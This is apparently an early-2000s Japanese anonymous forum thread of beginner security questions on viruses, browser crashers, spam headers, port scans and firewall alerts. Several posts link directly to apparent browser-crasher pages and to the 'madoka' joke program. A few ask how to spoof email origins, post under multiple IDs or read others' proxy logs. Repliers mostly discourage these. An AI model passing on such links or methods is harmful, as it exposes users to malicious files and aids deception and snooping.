一昨日あたりから、ネットしていると突然、大量に新しくウィンドウが開かれて（ブラクラって言うんですか？）困っています。
アダルトサイトにも逝ってないし、怪しいメ−ルは速攻削除していたのですが・・・・。

例えば、ＭＳＮメッセンジャ−を開いていて、新しくメ−ルを受信したりすると、何のボタンも押してないのに勝手に受信トレイが何十ウィンドウも開かれます。

これはパソコンのエラ−なんですか？それともウイルスなんですか？
対処法を教えてください。お願いします。

脳トンアンチビールスで定義ファイルを更新しようとすると
「一時フォルダが作成されませんでした」と出てしまいます。
いちいちシマンテックのＨＰ間で行くのも面倒なんで、何とか
アップデート出来るようにならないでしょうか？

>>177
バックでソフトが動いてるんだろ
タスクトレイとかmsconfigであやしい常駐を消せ

まあウイルスチェックをしないようなやつには何を言っても無駄か

>>178
いつからその状況に？
アンチウイルスを再インストールしてみたらどうだ？

システムエラ−チェッカ−使ったんですけど、途中で止まってしまったり、起動しなかったりで役に立ちません。
ウイルスチェックソフトは何も入ってないです・・・・。

無料ＤＬできるウイルスソフト探してみます・・・・・

ATT00076.txt(0バイト)
っていうファイルが送られてきたんですが。
ウイルスですか？

プロバイダのメールを、携帯から見たりするサービスで、パスワードが必要ないところどなたかご存知でないでしょうか？

メール受信したら「PBPGNOPB.EXE」ってファイルが添付されたメールが
ウィルスかと思って、トレンドマイクロのHPに逝って探したんだけど
結局、該当するウィルスはありませんでした
これってやっぱウィルス？
ちなみに件名は無し（Reとかも無し）、本文も無し

すいません、これ踏んじゃったんですけど・・・
http://www.top.or.jp/~godhand/a2.html
何なの？

>>184
hybris

>>185
直リンしないで。昔は無害だったけど今は知らん。

>186
ごめんなさい。無害である事を祈ります。
今からウイルスチェックしてきます・・・

添付メール、件名は「!&%」で、70KB。
送信者は友人のアドレスになっています。
プレビュー及び開封済みにはせず削除したので内容はわかりません。
昨年10月にも同じものを受信して、これで２度目です。
この種類として可能性があるのは何でしょうか？

すみませんがＩＰアドレスってどこまで個人情報が探れるんですか？
またはそういうサイトってありますか？

>>186
ん？HYBRISなの？新種かと思ってウキウキしてたのに（藁
ともあれサンクス

>189
http://www.watch.impress.co.jp/internet/www/column/hpsafety/hps6.htm

>188
今度からは、アンチウィスルソフトを購入しておき、自分で検査して調べて下さい

From:FunnyMoney< [email protected] >
To: [email protected]
Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:********
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From [email protected]
Message-Id:< [email protected] >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: funnymoney
X-PMG-Recipient: [email protected]

To remove yourself from this mailing list, point your browser to:
http://i.pm0.net/remove?funnymoney:10

Enter your email address ( [email protected] ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.

あげ

zone alarmをインストールしてみたんですが、さっそく
アクセスをブロックしてくれました。相手のＩＰアドレス
が表示されたんですが、これってどうすればいいの？

>>194
ほっとく

ナイスアドバイス　有難うございます。

www.anonymizer.comと同様のサービスをやってるとこを教えてください。
勿論英語＆有料可。
有料HTTP Proxyサーバなんてのがあったらマチベタ。

# anonymizerを更新しようと思ったら、クレジットカード決済ができなくなってた・・・。

q

CGIって何ですか？どうやって調べるもんなんですか？

>>191
サンクスですm（_ _）m

久々にブラクラチェッカーを使ってみようとしたところ、
何回やっても画面が最初の所に戻ってしまって使えませんでした。
最近ノートンのsystemworks2001をインストールしたんですが、
それと関係があるのでしょうか？
ＯＳはＷｉｎｄｏｗｓ98です。

ノートンのsystemworks2001をオフに！
−−−
ＳＱＬ使ってるとこでも最初に戻る。

>>202
素早い回答ありがとうございました。
気になっていたのですっきりしました。

guest guest

From:"SaveBig"< [email protected] >
To: [email protected]
Subject:Get the Credit You Deserve!
Date:***
Received:from [207.250.144.213]by sparklist.com
with ESMTP id leave-savebig-2158367U
From [email protected]
List-Unsubscribe:
< mailto:[email protected] >
-----
You are currently subscribed to savebig as: [email protected]
To unsubscribe send a blank email to mailto:[email protected]

度々すみません。
systemworks2001をオフにするにはmsconfigから
チェックを外せばいいんでしょうか？
それとももっと簡単な方法はあるのでしょうか？
よろしければ教えて下さい。

>>205
マルチ

>>206
タスクトレイで動いてないのか？
まずそれを切れ

>>207
なるほど！タスクトレイでできました。
ありがとうございました。

ﾉｰﾄﾝ入れたんですが、ブラウザの中身を吐かないとﾚｽ出来ないと言われました。
具体的にどうすればいいのでしょうか？
ちなみに、ノートン切ってレスしてます。

>>209
それノートンのスレに行けば、お仲間がｲﾊﾟｰｲいらっしゃるでしょう。

>>210
な、なるほど…

>>211
拡張オプション試した？

>>212
試してみます…

>>212
拡張オプションすら分からなかったっす…（鬱）

ノートンスレで聞いてきます。申し訳無い！

なんで今日はこんなに発言があるのに
こんなに下がっているんだ？

今日　何かあったの？

biwa39.he.netって何？
2chを閲覧してると接続してるみたいだけど？
バナーでもなさそうだし。

>>217
2chのサーバーのあるとこ

IPv6-IPv4ネットワーク間でのファイアウォールを構築したいのですが、
構築するためにはどのようにすればよいか教えてください！
現在、FreeBSDでv6/v4デュアルスタックルータとしてネットワークを
構築しています。
よろしくお願いします

>>219
同じようなことで悩んでいる人がいるみたい。↓
http://pc.2ch.net/test/read.cgi/sec/1010852192/l50

最近（年末あたりから）単発新規増えてませんか？

そんなスレあったらココのリンク貼って

そういう話題はこっち行ってやってください
と誘導してもらえませんか？

>>221
今に始まった事じゃないから今さら誘導しても無理

>>222
確かに。誘導して移動してくるような人は、最初から探してくるからね。
でも、何もしないよりはましだと思うな。誘導じたいは少しの労力でできるから。

立ったスレを削除することは出来ないけど
参加者を誘導することは出来るかもね

2chのスレで曲のURL（拡張子rpm）があったのでクリックしたら
「ダウンロードの終了」が出てそれ以来ネットで新しいブラウザを開く度に
「このPCに有害な影響を与えるアプレットのダウンロードが拒否されました」
とウインドウが毎回出て面倒です。どうしたら良いでしょうか？
ちなみに、ウイルスバスターのウイルスログでは
「JS_EXCEPTION.GEN」とあります。

削除せよ。９８か？　ｊｖｉｅｗは何？

レスありがとうございます。98です。
削除ってどうするのでしょうか？
今ウイルスバスターでウイルスのファイル検索っていうのを
一応していますが…。

あとすみません、jviewとは何ですか？

連続カキコですみません。
エクスプローラーで見つけて削除したのですが
相変わらず警告ウインドウが出てしまうのですが…。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

素人だからよく分からんけど、IEのスタートページを変更してみたら？

>230 IEのスタートページは通常通りで問題ないです。
ですが、ウイルスも削除して引っ掛からないのに
まだ警告ウインドウが出てしまいます。

このスレなら質問しても叩かれることは　まず無いのに
なんで新規でスレ立てるかな・・・。

1台のパソコンを使って、メールを全く別のところから送っているように
見せるにはどうしたらいいでしょうか？
とりあえずIPアドレスは本来の回線とは別に携帯電話で繋ぐように
する予定ですが、それでもヘッダに

Received: from unknown (HELO XXX) (IPアドレス)

と、XXXの部分にコンピュータ名が入ってしまいます。
これを一時的に本来のものとは別のものに変えたいのですが、
どうすれば簡単に変更できるでしょうか？
Windowsのシステムのプロパティでは再起動要求されてしまいますし、
非常に手間がかかります。
何かいいアイディア/ソフトがあればお願いします。

ZA使ってるんですけど、たまにポート8080とか3128
叩かれるんですが、これは誰かが俺のPCを串として使おうと
しとるんですか？或いは間違えてるとか・・？よくある事なんでしょうか？

OSはWin2000でサーバはたててないんですが・・

スレ違いかな？？

同じ板で同時に複数のIDを使い
多人数で書き込みしているように見せるにはどうやればいい？
４〜５のID同時使用で。

>>233
手間がかかるのが嫌なら方法はない
あきらめろ　迷惑だ　犯罪につながる

>>234
よくある事
ポートの勉強をしろ

>>235
板ちがい

>>237
早速のレスありがとうございます。
よくある事なんですかー・・勉強しますね。
ちなみにpix01.ibill.com(アメリカ）からでした・・(;´Д`)

>>236
会社のマシンから、ある個人に送りたくないんですよ（＾＾；
会社のマシンの設定変えるってなると戸惑いますが、
それが最短の方法ですか？
一時的に変えるメーラーとか、鯖とのやりとりを監視して
修正するソフトとか、そういうのはないですかね？
ネットワーク関連に疎いので全然わかりません。
ですが、方法があれば勉強はしたいと思います。

>>240
会社から送らなきゃいいだろ
会社は仕事するところだ　遊ぶな
PCの設定変えたところでメールのやりとりはすべて会社に
記録されてるかもしれんしな

先程、ノートン先生警備からの報告で、211.227.158.92
からのアタックを３連発喰らったとあり、防御したとの
事。
相手はカンコックテレコム系のIPなのですが、何の目的
で平和な我が家のPCを狙ったのかよく分かりませぬ。
XPのADSLツール使用のため、問答無用で割り当てIPに
アタックしてきたのか、狙い撃ちなのか、どうかこの辺
詳しい方に教えていただきたいのですが。よろしく。

>>238
どこの板が該当なんでしょう？

>>242
アタックはよくあることだ　気にするな

>>243
初心者質問板行け

>233
どのみちIPアドレスで、会社からの送信だとバレますが？
会社のマシンで私的なメールを扱っていると、サーバ管理者がチェック
していて、あとあとシャレになんない場合があります。

いや、ノートなんで営業で外に持ち歩いてるときは大丈夫です。
どっちみち再起動無しで変更は無理なんでしょうか？

無理

244様。これで安心して眠れそうです。
どうやらNTTからの割り当てIP近辺を
総当たりしているようなので。

これでまた韓国人の心象が悪くなりました。
行きたくない国のNO１へ昇格。

>>246
だから会社のPCを私物化するなって！
貧乏人なら汗水流して稼げ　PC買え

>>248
近くていいとこなのに
焼肉うまいのに
サッカーの共催もあるのに
日本より進んでる部分もあるのに

電源切っても外国のエロサイトが次から表示されてしまうのですがどうすればよいのですか

>>251
OS再インストールしろ
エロサイトの見過ぎ　来月はQ2課金で請求が万単位だろうな

でもぶろっくはかかってます

IEなら、ツール＞インターネットオプション＞全般のホームページ
URLを自分が本来使っていたトップページのものに変更＞適用＞OK

ってこれセキュリティ板で聞く事なんでしょうか？

すみません　あせってます

Macから送ったら

Received: from unknown (HELO ?IPアドレス?) (IPアドレス)

ってIPを？で挟むコンピュータ名になってましたが、
これはMacだけですか？
それだけでも教えてください。

さっきそれやってもだめだったのですが

>>256
メーラーによる
早く寝ろ　明日も会社だろうが

>256
うちはそうなっていない。メールソフトによるのか？

>>257
だから、251が「OS再インストール」と言っているが、それはやったのか？
あせっているときは、ちまちま小手先の処理で直そうと考えるより、
一足飛びに再インストールや初期化した方が、結果的には早い

>>257
OS再インストールしろって
夜中に何焦ってるんだよ

Me/XPなら当てにならない復元モード使うか、必要なファイルの
バックアップを念のため取って置いてOS復元セットアップ。
それでも駄目ならいっそのことOSクリーンインストールしろ。
勿論、強制フォーマットをかけてからな。

莫大な容量のエロ動画とか溜め込んでなければ、一般的に
使っている環境に復帰させるまで２時間もあれば出来る
だろう。

>>257
これとか。
ttp://homepage2.nifty.com/winfaq/superfaq.html#370

どうやるの

>263
その妄言は、262のURL読んだ上で言っているのか？
何が解らないのか、きちんと書かないで、答えがもらえるとでも？

>>263
バカで素人な厨房は早く寝ろ
明日も学校だろうが

Outlook Expressなどの設定にある
セキュリティで保護されたパスワード認証（SPA)の
SPAってどういうものですか？

用語集をいくつか調べましたがどこにも載っておらず
検索しても温泉ばかりでてきてしまいます。
APOPのようなものだというのは分かるんですが、どこで
いつ頃作られた〜あたりの歴史的な部分と技術的な部分を
詳しく教えていただけないでしょうか。

よろしくお願いします。

>>266
http://www.google.co.jp/search?q=spa%81@%83Z%83L%83%85%83%8A%83e%83B&hl=ja&lr=

SPAってなんの略なの？

tes

　　

ノートンアンチウイルス2000をいれてて、2002にアップデートしようと思ったんですが。
インストール時に「Nav2000をアンインストールしてください」っていわれました。
で、アンインストールしようとしたんですが、インストールシールドが「navnt.isuが壊れています、アンインストールを中断します」って表示してアンインストールができません。
手動でなんとかしようとおもったんですが、保護ファイルみたいでなんともできません。
マジ困ってます、誰か手動で消す方法しりませんか？
OSはWin2000です。

>271
マルチポスト

>>272
ソースは？

>273
http://pc.2ch.net/test/read.cgi/sec/1011088064/n17

>>268
Secure Password Authentication

つかSPA駄目駄目じゃん。
http://securitytracker.com/alerts/2001/Nov/1002808.html

グーグルのクロールの間隔を教えてください（１ヶ月おきとか）。
よろしくお願いします。

>277
ここで聞くのが適切
「ロボット検索エンジンに登録してもらえません」＠Web制作
ttp://pc.2ch.net/test/read.cgi/hp/998710554/l50

>>277
意外と頻繁に来てたような気もするけど。。。>ボットちゃん

こんなメールが毎日くるようになってしまいました
ホットメールです
かってにメールアドレス使われているんでしょうか

送信者　Mail Delivery Service <[email protected]>
- These recipients of your message have been processed by the mail server:
[email protected]; Failed; 5.1.1 (bad destination mailbox address)

Remote MTA mx3.prodigy.net: SMTP diagnostic: 550 5.1.1 <[email protected]>... Addressee unknown

送信者はほかにも[email protected]とか
いろいろです。メールアドレスがたくさんかかれていて（ABC順）
その脇にすべてUser unknownと書かれているのもきます。

>280
メールアドレス詐称されたって事？基本的にはどうしようも無い様子。
ttp://www.atmarkit.co.jp/fsecurity/column/mail03/sec01.html

Received: from rcpt-expgw.biglobe.ne.jp (210.147.6.213) by [email protected] with SMTP; ***
Received: from smtp-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id MANKO_931!!! for <[email protected]>; Moon, 32 USA 3001 25:61:70 +2500
From: [email protected]
Date:Moon, 32 USA 3001 25:61:70 +2500
X-Biglobe-Sender:< [email protected] >
Received: from MUSASHI88 (211.18.239.190 [211.18.239.190]) by smtp-gw.biglobe.ne.jp id PUSSYJENNA;Moon, 32 USA 3001 25:61:70 +2500
Message-ID: <bijlogyiokcty78645jiog@MUSASHI88>
To: <[email protected]>
Subject: SE45-75万 PG40-50 PCサポート2 0-45待機時支給 社保有
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-2022-jp"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

Q1.cookie からパスワードって解析できる？一見わかんないんだけど。
Q2.掲示板からIP抜くって、こっちが掲示板に何か埋めておいてもターゲットが踏まない限り無理？

==H======================================================

　　　　　　　　　２ちゃんねるのお勧めな話題と
　　　　　ネットでの面白い出来事を配送したいと思ってます。。。

===============================読者数：84480人　発行日：2001/12/21

どもども、ひろゆきですー。
こないだのメルマガでお知らせしましたが、警察を相手にしたおいらの勇姿見てくれましたかー？
警察を相手にしても一歩も引かなかったですよー。
いやあ、５月に珍走団に土下座させられて以来、「ひろゆきってヘタレ？」なんて言う奴等が
いるので頑張ってみたですよー。
「得意気に武勇伝を披露する中学生みたいで馬鹿みたい」なんて声も聞きますが大きなお世話ですー。

実を言うと、おいらは企業や警察を相手に勇姿を見せるのは結構得意なんですー。
この連中はいきなりパーンチやキーック飛ばしてくることはないですからねー。
苦手なのはやっぱり珍走の連中ですー。
あいつらときたら、おいらの屁理屈に全く耳を貸しませんからねー。
まったく困った連中ですー。えぇえぇ、、、

ところで今回発売した本の中で珍走団との一件をいかにもクールに乗りきったように嘘を吐いて
しまいましたが、これって奴等の世界じゃ背信行為に当たるんですよねー？
本当は丁重に詫びて許してもらったわけですからー。
もし珍走団がそれを読んで再び乗り込んできたらどうしたらいいんすかねー？
もちろん言い分けは用意してありますけど、言葉遊びに付き合ってくれるかなあ、、、
なんだかちょっぴり不安な今日この頃ですー。。。

それはさておき、最近みんなおいらに冷たくない？なーんか信者だって激減してきたしー、、、
以前はネット王子とかwebヒーローなんて言ってもて囃してくれてたじゃん、、、
それが最近じゃ、ワキガ王子に歯糞オトコなんて、、、ちょっとひどいよー（泣
明日からは頼んだじょ！

んじゃ！

>>283
１、できる人はできるでしょ

２、IPは定義だから抜く抜かないの問題は関係無し　本でも読め

http://pc.2ch.net/test/read.cgi/hp/998710554/l50

プロキシに書き込まれたログ（他人の）をリアルタイムに見るにはどうすればいいんですか？

>>287
rootになる。これ最強。

あのー、
攻殻機動隊に出てくる攻性防壁みたいな
無敵のファイアーウォール+アタックのプログラムって
どうやったら作れますか？

わざわざプログラムを組まなくても、
普通の電話回線+アナログモデムでパケットを四六時中吐き続けたら
攻撃しつつ防御できるけど、どうよ？

攻撃は最大の防御なり。ってね。（ｗ

　　　　　　　　　　　　　　　　　　　　　　　　　　　

>>289 まるち

Windumpでログを取りたいのですがどうすれば良いんですか?

>>294
windump > file.name

初心者ですみません。
掲示板のソースを表示させてもIPアドレスの表示らしきものは無いのに、
どうしてアドレスがわかるのでしょうか？

>>296
ソースに表示されないように工夫してるんだろ

>>296
データファイルの位置を知っている。

>>296
ログを見てるんだよ。意味がわからないなら、そのCGIスクリプト
を自分のサイトとか無料HPスペースとかに設置してみな。
そうすりゃ少しは分かるだろ。

http://www.zdnet.co.jp/news/0201/16/e_ie.html
↑これ外出？

初めて「トロイの木馬」に感染してしまいました〜(T_T)
ウイルスを削除して再起動しました。ファイル等には異常は
みられませんが、これで本当に大丈夫なのでしょうか？

ノートンのセキュリティソフトを購入したんですが、
中に説明書とソフトが入ってました。

凄く気になるんですが、
なんで箱があんなに大きいんですか。中に入ってた品の5倍位、箱がでかいです。
スカスカです。
箱が大きい理由を教えて。

>>302
万引き防止のセキュリティ

>>303
それ本当なの？

モデムのケーブルをパソから抜いていても、
パソがハックされる恐れはあるんでしょうか？

>>304
こんな記事みつけたが・・ホントみたいだな。
理由はそれだけじゃないみたいだが。
ttp://www.digichro.com/vol49/index2.htm

>>305
恐山と言えばイタコだな

>>306
なるほど。
いろいろな例があるんだな。

>>305
抜いている間は大丈夫。

ＩＰ抜かれるとどうなるんですか？

>>310
固定IPで無いなら気にするな。

>>298
もう少し詳しく教えてください。
>>299
管理人でなくてもログがわかってしまうんですか？

なら、ＩＰ抜かれただけで個人情報とか漏れないですよね？

ほんといなくならんよね。IP厨って…

>313
ttp://www.watch.impress.co.jp/internet/www/column/hpsafety/hps6.htm
読んでおけ。

子供がＷＥＢにはまっていて、ちっとも勉強しない
２０時から２２時までＷＥＢにつながるとかっていう
方法はないですか？

>312
掲示板のプログラムによっては、書き込みのデータやログを、別ファイルにして
記録している場合もある。そのファイル名や存在するフォルダ名は、たいてい
プログラムによって決まっている。

ある掲示板がよく知られているCGIスクリプトだったりすると、同じスクリプト
を使っている人には、何処にログがあるか解ってしまう。だから、適切なアク
セス設定をしていないと、管理人以外の人が、そのログを見ることもできてし
まうかも知れない。

>>316
殴ってでもちゃんと子供をしつけて、親の言うことを聞くように教育して下さい。

>>316
ただのダイヤルアップ接続にすれば？テレホとかも申し込まないで。
長時間やると電話代がエライ事になるから、生活が苦しくなる。
と言って時間を短くさせるのだ（藁

>>318
その考えは、自分で電話代なりの費用を負担してる人間ならではじゃないかなあ（ｗ
スネかじりのガキは気にしないんじゃない？

>>319
確かに・・じゃあ「ネットたくさんやるとご飯食べられなくなるよ」
って言うとか（藁

初心者です。

http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip

上のＵＲＬで変なソフトをダウンロードしてダブルクリックしたら
パソコンが変になりました。
１５分に一度くらい画面が急に変わって
不気味な女の子の顔が画面いっぱいに広がって
不気味な悲鳴が…
心臓に悪いです。

どうすれば正常にもどりますか？
教えてください、お願いします。

>>321
供養

>>321
つーか、直林するなよ。ホントに心臓悪い人が踏んじまったら
どーすんだ？（ｗ　責任取れんのか？
http://pc.2ch.net/test/read.cgi/hack/1011083919/

ニッパーで線を切る

>>321
www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/uninst.zip
これでも落としてこいヴァカ。
本当にアンインストできるかは知らんが(w

>>321
初心者さんへ
直リンクだけはやめて下さい
他の初心者さんが更に引っ掛かってしまいます

Badtrans.Bに引っかかってしまいました。
受信トレイの中のアドレスを使われるとネット上で書いてあったのですが、アドレス帳のアドレスは使われないのでしょうか？
あと、昔アウトルックを使っていたのですが壊れてデータがサルベージできなくなっています。
それで現在アウトルックエキスプレスを使っていたのですが、昔の受信トレイのアドレスも使われてしまうのでしょうか？
受信トレイ以外のフォルダのアドレスも不安です。
受信トレイ以外のところのアドレスは確認したところ、メールアドレスが存在してませんでしたので大丈夫でした。

昨日からＡＤＳＬになったのですが、それ以降ゾーンアラームが
一件も表示していないのですが、ちゃんと機能しているのでしょうか？
ルーター付きモデムだから引っかからないのかな？
それともどこかで使用法間違ってます？ゾーンアラーム起動する前から
ＡＤＳＬつないでちゃいけないんでしたっけ？

>327
専用スレ読んでみた？
>>328
ルータがあるなら、ソレがブロックしているのかも知れない。断言できんが

>>327
アドレス帳のも使われると思われ
びびり過ぎだ　ウイルスを削除すれば問題無し

ADSLにしてから
リアルプレイヤーがエラーを起こしやすくなった気がするんですが、
私の気のせいでしょうか？
ただの偶然なのか、他にもそういう経験をされた人もいるのか？

>>331
回線速度の設定をしてないとか？

ＰＣを起動すると無題のメモ帳が大量に開くのですがこれは何？

>>332
回線速度はダイヤル接続時の56kのままでした。
ADSLの場合にはどう設定すればOKですか？512kbpsでいいのかな。

port:6699ってどんなサービスに割り当てられているのですか?
今日、とんでもない数(500回）のアクセスがポート6699にあり
驚き戸惑っています。5分間の間にこれだけのアクセスがあったのは
今回が初めてです。
宜しくお願いします。

>333
スタートアップに変な物入っていない？
>>335
WinMX

>335　レスサンクスコ！でも、自分はMXやってないです。
　　　　MXって6699使ってるの？
　　　　自分はフレッツADSL使ってます。
　　　　他に考えられる原因あります？

貴方が今使っているIP アドレスと同じ番号を、以前つかっていた人（Ａ）がいて、
その人が（おそらく）ＭＸ使っていた、と。
で、ＡのマシンにアクセスしていたMXユーザがいっぱいいた。
その後、そいつのIPが貴方のマシンに割り振られた。
周囲のMXユーザは、そうとは知らずに、Ａのマシンにアクセスするつもりで、
かつてＡが使っていたIPアドレスにアクセスしてみた。
すると、MXやっていない貴方がアクセス受けた。

>３３５さん　
Battery　Scope、Microsoft　FindFast、officeｽﾀｰﾄｱｯﾌﾟ、PawerPanel
PPK　Setup（server）
がありますが初心者なので何がいけないのかよくわからないのですが。

＞339貴方のコンピュータ環境が良く判らないので、キチンと答えるのは難しいが。
バッテリ、ＭＳオフィス関連が２個、までは想像できる。
最後の２個は知らない。

あと当然ウィルスチェックはしていますよね？

>339さん、レスありがとうございます。
どうやらofficeｽﾀｰﾄｱｯﾌﾟが原因の様です。
ログの時間を再度見直した所、Wordを
使っていた時間と重なっていました。
多分、ワードの仕業かと思います…。
でもどうしてWordを起動しているとポート6699に
外部からアクセスがあるのでしょうか？ライセンスチェック？
バージョンアップ報告の通知？
Zonealarmでチェックできる限りのアクセスは全て自分でチェック
しているのですが、こっそり情報を送っているのでしょうか?
うぅ〜ん、自分には分からないです(ﾟДﾟ;)。

何となく安心できました。謝謝です（･∀･）！

>340さん
「ＭＳオフィス関連が２個」について詳しく教えて頂けませんか？
宜しくお願いします。

6699ってもしかするとSubsevenのデフォルトポート？

>342
339に、「Microsoft　FindFast、officeｽﾀｰﾄｱｯﾌ」とあるから。
というか、「？？？」氏のレス（339）は「6699」氏宛だったのか？
私が「336」で「？？？」氏にスタートアップをチェックしろと書いた事
へのレスとして、スタートアップにある物を列記していたと思っていたのだが
（「336さん」と書こうとして「335さん」と書いたと解釈）俺、激しく勘違い？

>>343
んな訳ない。

＞343
ttp://www.geocities.co.jp/SiliconValley-Cupertino/5128/500_compu/portlist.html
6699 は、ナップスターなど、個人間でファイルをやり取りする（P2P）ソフトで使用

>｢ななし｣さん
「？？？」氏のレス（339）は「6699」氏宛だったのか？
そうではありません。

私が「336」で「？？？」氏にスタートアップをチェックしろと書いた事
へのレスとして、スタートアップにある物を列記していたと思っていたのだが
そのとうりです。

ウィルスチェックもしましたが何も出てきません。
この症状が出る前日圧縮ファイルをLhacaで解凍してからこの起こっているのではと
思うのですが(その解凍されたファイルは捨てたので現在はありません）
ウィルスではなくジョークソフトのようなものでしょうか？

テスト

>344さん、>333さんの質問で「スタートアップチェックしろ」と言われ
>>333さんがスタートアップフォルダに入っているアプリの名前を挙げた
のを、6699にアクセスするアプリと自分が勘違いした?みたいですね。
自分の勘違いです(ﾟДﾟ;　)。混乱招いてすいませんm(_ _)m
でもport:6699に頻繁にアクセスがあったとき自分はWordとIE6使っていました。

>>338さん、ご説明ありがとうございます。大変わかり易かったです。
でも、IP割り当てってこれほど狭い範囲(時間)で以前利用されたにIPアドレス
を次の利用者に割り当ててしまうものなんですか？
だとするとプロバイダの問題でしょうか？
少ないIPアドレスしか保有していない?(できない)プロバイダが原因なのでしょうか？
因みに自分はフレッツADSLで「ぷらら」加入です。

>>346さん、リンク先参考にさせて頂きました。情報ありがとうございます。

>>338さんがおっしゃる内容で>346さんの情報で、最終的にはいいのかな？

>349
狭い範囲(時間)で以前利用されたにIP(訂正前）
↓
狭い範囲(時間)で以前利用されたIP（訂正後）

>>よくある事だと思うんですけど。

>347
「この症状が出る前日圧縮ファイルをLhacaで解凍してから」という記述から、
それが怪しかったかも知れません。それが、ジョークソフトなら、添付の説明書や
ソフトの配布元に注意書きがあるかも知れません。それをチェック。

スタートアップに問題がないなら、Win.ini辺りに書き込まれているのか。
Win.ini編集で直せるかも知れませんが、初心者には勧めにくいかと。

>>349
使用可能なIPアドレス数が100個あっても、現在98人が使用していれば、
新たに割り振ることができるアドレス数は2個になります。

>352ななしさん
そのファイルは画像提示版から拾ったものなのですが今は閉鎖されているようで何もわかり
ません。
ものすごく困っているわけではないのですがやはり起動するたびに無題のメモ帳が大量に開いて
うっとうしいのでこの際ハードディスクを初期化して再インストールしようと
思います。
どうもありがとうございました。

しばらく経ったらデータを消去……
そういうのってありますよね？
これってウィルスなんですか？（スキャンに引っかかってくれるのか）

>354
・・・質問の意図が良く判らないのですが、これのこと？
ttp://ton.2ch.net/sec/kako/1001/10016/1001662997.html

ttp://www.upsizing.co.jp/news/report0426-2.htm
ここで調べたらPort80だけオープンでした。やばいですか？
クローズにしたほうがいいのかと思いましたがやりかたが
わかりません。

>>355
アリガトウ。

>356　　８０閉じちゃったらウェブ見れないかもしれない…

んなこたぁない

>356　　８０閉じちゃったらウェブ見[せら]れないかもしれない…
>>358
惜しいね。2文字余計に入れてれば少しは違う。

YBB使っています。
ファイヤーウォールはゾーンアラーム。
この３時間半で５１回もブロックの警告が出ているのですが
これって異常なことなんでしょうか？
アクセスされているのは、ほとんど同じIPみたいです。
同じような境遇のかた、徐々に減っていくのか増えていくのか
宜しかったら教えていただけませんか？

>361
過去スレに５分間で500回アクセスがあった、てのもあるが。
今後どうなるか知らんが、
ゾーンアラーム君がブロックしているんだから、気にする必要なし

http://216.105.37.221/images/gif022.gif

↑って何ですか？

>>363
マルチポスト

>>363
漏れのPC、カウントダウンの後爆発しました！！！！！！！！

>>363
だから直リンすんじゃねぇよブォケ
おまえが自分でウィルスチェックしれ！！

>363
マルチ。しかも、「ブラクラかウィルスらしいが、誰か教えて」だと。

>>364
マルチポストって何ですか？
ウィルスですか？

マルチポストくらい、グーグルで検索しろ

>>368
そうです。
常駐して、あちこちに同様の質問レス機械的にカキコしまくるVIRです。
亜種は、スレッド立てたりもします。
パターンファイルは、定期的に更新しときましょう。。。

>>363
只のgifアニメでしょ。。。
もっと、えげつなくドキッとさせる奴どっかに有ったよ。。。

と、まぢれすしてみる今宵かな。

>>362
361です。どうもありがとうございます。
ひとまず安心していいんですね。
しかし導入前にどれだけアタックされていたかと思うと
ちょっとドキドキしました。

>>370
ﾜﾗﾀ

うわぁ〜ん(涙
eroxふんでた.....。
それクリックしてないから大丈夫とは思うけど
これからNTTと国際電話に確認しないと.....。
ヴァカ＞自分

>>374
Downloaded Program Files　フォルダーをDOSで見ると
面白いことになっている。

>>371
ありがとうございます。

>>375
DOSわからんから.....。
いちお、スタートアップとデスクトップと
Dailsoftとかいうのはゴミ箱ぽいっ！ってしたけど....。
画像掲示板でやられた.....。

>>377
ダイヤルアップの設定は消した？

>>378
bobonetはけした。いつも接続先確認はしてたから
大丈夫な気もするけど...。
うーーーん。Q2できないようにするのと国際電話かからないように
手続きをしてきます。最初、スタートアップとデスクトップ
だけ消して(すぐ気がついたんで）それでいいかと思ったら
変なフォルダ作ってあったのでびっくりです。接続のデフォルトまでは
書き換えていませんでしたが....。ひとつお勉強になりましたが
Q2と国際電話の確認ができるまで不安です。ふぅ

WinXPにしたらBlackICE 2.5Jが使えなくなりました。
代わりになるお勧めのソフトを教えてください。

さっき、madokaっていうソフトのアイコンをクリックしたら。
東洋人の女性の画像が出てパソコンがフリーズ。
再起動したら。突然、さっきの画像と悲鳴がパソコンから、度々。
有名なウィルスなのかな？ウィルスバスターかけてもなんともないし。
心臓に悪いよう。

＞381
良く知らないで、アイコンをクリックするのは辞めましょう。
貴方の不用心が悪いんです。これに懲りて、今後はヤメレ
消し方は、以下をよく読んで下さい。
http://pc.2ch.net/test/read.cgi/hack/1011083919/l50

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.159.0.0-210.159.4.0
b. [ネットワーク名] WCN
f. [組織名] 大阪メディアポート株式会社
g. [Organization] Osaka Media Port Corporation
m. [運用責任者] KS902JP
n. [技術連絡担当者] HU1127JP
p. [ネームサーバ] ns1.omp.ad.jp
p. [ネームサーバ] ns2.omp.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 1997/04/04
[返却年月日]
[最終更新] 2001/11/22 11:53:18 (JST)
[email protected]

何回も仕掛けてくんなよ。　うざい。

http://www.geocities.co.jp/SiliconValley-Bay/4700/image01.gif
これってスパイウェアーですか？
クッキーが仕込んである。

>360さん、ウェブサーバーは80開けていないといけないの？
じゃぁ、一般ユーザーは閉じても大丈夫？普段の利用に特に問題おきませんか？
「かもしれない… 」付けておいてよかったぁ。嘘教えるところでした。
閉じ方教えて頂けませんか？便乗すいません。
勉強になりました。
>>361さん、YBBいろいろ問題あるみたいだから以下のスレ読んでみるといいと思います。
